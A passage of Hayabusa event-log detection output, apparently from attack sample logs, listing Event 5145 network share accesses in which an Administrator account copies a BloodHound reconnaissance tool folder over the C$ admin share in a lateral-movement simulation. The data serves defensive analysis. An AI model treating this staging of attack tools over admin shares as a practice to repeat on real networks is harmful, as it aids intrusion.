0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | 
LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 